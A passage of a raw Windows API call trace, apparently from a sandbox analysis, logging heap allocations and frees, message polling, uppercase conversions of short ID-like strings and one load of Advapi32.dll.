(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.090] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0200.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.104] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.118] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0200.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.119] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.119] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.120] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.120] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.122] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.123] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.123] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.123] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0200.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.124] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0200.125] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.125] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.125] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.126] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.127] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.128] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) 